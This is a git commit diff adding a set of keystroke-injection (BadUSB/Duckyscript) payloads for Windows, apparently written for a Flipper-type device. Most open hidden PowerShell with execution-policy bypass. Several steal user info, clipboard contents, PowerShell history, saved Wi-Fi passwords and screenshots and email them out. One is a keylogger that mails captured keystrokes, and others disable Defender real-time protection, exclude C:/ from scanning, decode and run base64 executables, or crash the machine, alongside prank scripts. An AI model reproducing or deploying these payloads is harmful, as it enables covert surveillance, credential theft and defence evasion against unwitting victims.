Add files via upload

2025-12-31 23:15:54 -08:00 · 2023-05-08 23:18:54 +00:00
parent 2df1c16b87
commit df9547205e
16 changed files with 984 additions and 0 deletions
--- a/Information.txt
+++ b/Information.txt
@@ -0,0 +1,56 @@
+REM Title: Email System & User Information
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather user and system information and send to an Email.
+REM Target: Windows 10
+
+REM *REQUIREMENTS*
+REM you will need a Microsoft Outlook Email address for this to work
+
+REM *SETUP*
+REM replace EMAIL_HERE and PASSWORD_HERE below.
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM replace EMAIL_HERE and PASSWORD_HERE below.
+STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE"
+
+REM main powershell code
+ENTER
+DELAY 100
+STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String)
+STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem
+STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount
+STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)"
+STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version
+STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"}
+
+STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+"
+STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){
+STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None"
+STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;}
+STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
+
+STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+
+STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time"
+STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force)
+STRING ;$time = Get-Date;$ct = $time.addminutes($lost)
+
+STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl
+STRING ;sleep 1;exit
+ENTER
--- a/Screenshot.txt
+++ b/Screenshot.txt
@@ -0,0 +1,61 @@
+REM Title: Email System & User Information
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather user and system information and send to an Email.
+REM Target: Windows 10
+
+REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked*
+REM TURN OFF RT-PROTECTION BEFORE RUNNING
+
+REM *REQUIREMENTS*
+REM you will need a Microsoft Outlook Email address for this to work
+
+REM *SETUP*
+REM replace EMAIL_HERE and PASSWORD_HERE below.
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM replace EMAIL_HERE and PASSWORD_HERE below.
+STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE"
+
+REM main powershell code
+STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String)
+STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem
+STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount
+STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)"
+STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version
+STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"}
+
+STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+"
+STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){
+STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None"
+STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;}
+STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
+
+STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append
+
+STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing
+STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top
+STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
+STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png)
+
+STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time"
+STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force)
+STRING ;$time = Get-Date;$ct = $time.addminutes($lost)
+STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl
+STRING ;sleep 10;exit
+ENTER
--- a/OSINT/Installed
+++ b/OSINT/Installed
@@ -0,0 +1,26 @@
+REM Title: Programs and Eventlogs to File
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file.
+REM Target: Windows 10
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM the main powershell script.
+STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath
+STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn
+STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null}
+STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append
+STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634}
+STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append
+STRING ;sleep 30;exit
+ENTER
--- a/OSINT/Keylogger
+++ b/OSINT/Keylogger
@@ -0,0 +1,484 @@
+REM Title: Email System & User Info (old)
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather system info and send it via Email.
+REM Target: Windows 10
+
+REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types)
+REM this is a quick and dirty fix that i will revise in the near future.
+
+REM *REQUIREMENTS*
+REM you will need a Microsoft Outlook Email address for this to work
+
+REM *SETUP*
+REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script)
+REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM Open Notepad for script building.
+DELAY 1000
+GUI r
+DELAY 500
+STRING notepad
+ENTER
+DELAY 2500
+STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt"
+ENTER
+STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
+ENTER
+STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @'
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+ENTER
+STRING '@
+ENTER
+ENTER
+STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun  -ge $rnnr){
+ENTER
+STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock
+ENTER
+STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder
+ENTER
+STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}
+ENTER
+STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl
+ENTER
+STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5)
+ENTER
+DELAY 1000
+
+REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types)
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+
+
+DELAY 10000
+REM save in temp directory.
+DELAY 1000
+CTRL-SHIFT s
+DELAY 1500
+STRING %temp%
+ENTER
+STRING txtlog.ps1
+DELAY 500
+TAB
+DOWN
+DOWN
+ENTER
+ENTER
+DELAY 1000
+ALT F4
+
+REM Open Powershell and start logs.
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit
+ENTER
+
--- a/Kill.txt
+++ b/Kill.txt
@@ -0,0 +1,20 @@
+REM Title: 5 Second Display Kill
+REM Author: @beigeworm
+REM Description: Uses Powershell to kill all displays for a short period of time.
+REM Target: Windows 10,11
+
+
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage
+STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit
+ENTER
--- a/Pranks/BSOD.txt
+++ b/Pranks/BSOD.txt
@@ -0,0 +1,21 @@
+REM Title: Invoke BSOD
+REM Author: @beigeworm
+REM Description: This will open powershell and cause a blue screen.
+REM Target: Windows 10
+
+REM ***This is a dangerous script - Be Careful!!!***
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+STRING taskkill /f /im svchost.exe
+ENTER
--- a/Pranks/Dsktop
+++ b/Pranks/Dsktop
@@ -0,0 +1,24 @@
+REM Title: Dsktop Shortcut Spammer
+REM Author: @beigeworm
+REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM *replace 200 with the number of shortcuts you want to create.*
+STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe"
+
+REM rest of the script.
+STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk")
+STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0"
+STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit
--- a/Pranks/Invoke
+++ b/Pranks/Invoke
@@ -0,0 +1,44 @@
+REM Title: Invoke Fake Windows Update
+REM Author: @beigeworm
+REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen.
+REM Target: Windows 10
+
+REM some setup for dukie script.
+DEFAULT_DELAY 200
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM create the .vbs script to start chrome and go fullscreen.
+STRING cmd
+ENTER
+STRING cd $env:temp
+ENTER
+STRING copy con update.vbs
+ENTER
+STRING Set WshShell = WScript.CreateObject("WScript.Shell")
+ENTER
+STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False
+ENTER
+STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s"
+ENTER
+STRING WScript.Sleep 200
+ENTER
+STRING WshShell.SendKeys "{F11}"
+ENTER
+CTRL z
+ENTER
+STRING start update.vbs
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 1000
+
+
--- a/Pranks/Rickroll
+++ b/Pranks/Rickroll
@@ -0,0 +1,51 @@
+REM Title: Rickroll with Max Volume spam
+REM Author: @beigeworm
+REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll.
+REM Target: Windows 10
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM create the .vbs script to keep the volume maxed.
+STRING cmd
+ENTER
+STRING copy con volup.vbs
+ENTER
+STRING do
+ENTER
+STRING Set WshShell = CreateObject("WScript.Shell")
+ENTER
+STRING WshShell.SendKeys(chr(&hAF))
+ENTER
+STRING WScript.Sleep 10
+ENTER
+STRING loop
+ENTER
+CTRL z
+ENTER
+STRING start volup.vbs
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 1000
+
+REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up.
+GUI r
+DELAY 1000
+STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ
+ENTER
+DELAY 2000
+STRING f
+
+
+
--- a/edition).txt
+++ b/edition).txt
@@ -0,0 +1,33 @@
+REM Title: Start Windows-93 (parody edition)
+REM Author: @beigeworm
+REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93.
+REM Target: Windows 10
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open cmd and kill edge.
+GUI r
+DELAY 500
+STRING cmd
+DELAY 200
+CTRL-SHIFT ENTER
+DELAY 1000
+ALT y
+DELAY 1000
+STRING taskkill /F /IM msedge.exe /T > nul
+DELAY 100
+ENTER
+DELAY 500
+STRING exit
+ENTER
+
+REM open edge and fullscreen.
+DELAY 500
+GUI r
+DELAY 500
+STRING msedge -kiosk www.windows93.net
+DELAY 100
+ENTER
+DELAY 1000
+F11
--- a/C-drive.txt
+++ b/C-drive.txt
@@ -0,0 +1,23 @@
+REM Title: Add Exclusion C-drive
+REM Author: @beigeworm
+REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
+REM Target: Windows 10
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM add the exclusion path.
+STRING Add-MpPreference -ExclusionPath C:/
+ENTER
+DELAY 250
+STRING exit
+ENTER
--- a/Tools/Base64
+++ b/Tools/Base64
@@ -0,0 +1,30 @@
+REM Title: Base64 Decode & Execute
+REM Author: @beigeworm
+REM Description: Uses Powershell to decode a Base64 string and then execute the file.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace all placeholders throughout the script.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+CTRL-SHIFT ENTER
+DELAY 1500
+ALT y
+DELAY 5000
+
+REM *replace this below*
+STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';
+
+STRING $decodedFile = [System.Convert]::FromBase64String($b64);
+
+
+REM *replace NAME_HERE and desired filetype (example is .exe)*
+STRING $File = "NAME_HERE"+".exe";
+
+STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File
--- a/RT-Protection.txt
+++ b/RT-Protection.txt
@@ -0,0 +1,30 @@
+REM Title: Disable Real-Time Protection
+REM Author: @beigeworm
+REM Description: Manually opens Windows Security window and turns offf Real-Time Protection.
+REM Target: Windows 10
+
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open Windows Security GUI.
+GUI r
+DELAY 1500
+STRING windowsdefender://
+ENTER
+DELAY 2000
+
+REM run through option list and turn RT-protection off.
+ENTER
+TAB
+TAB
+TAB
+TAB
+ENTER
+DELAY 200
+SPACE
+DELAY 300
+ALT y
+DELAY 400
+ALT F4
+
--- a/Tools/Download-Execute
+++ b/Tools/Download-Execute
@@ -0,0 +1,23 @@
+REM Title: Download-Execute from Run Prompt
+REM Author: @beigeworm
+REM Description: Uses the Run Prompt to download a file and run it.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace FILE_URL_HERE with the url of your file to run.
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
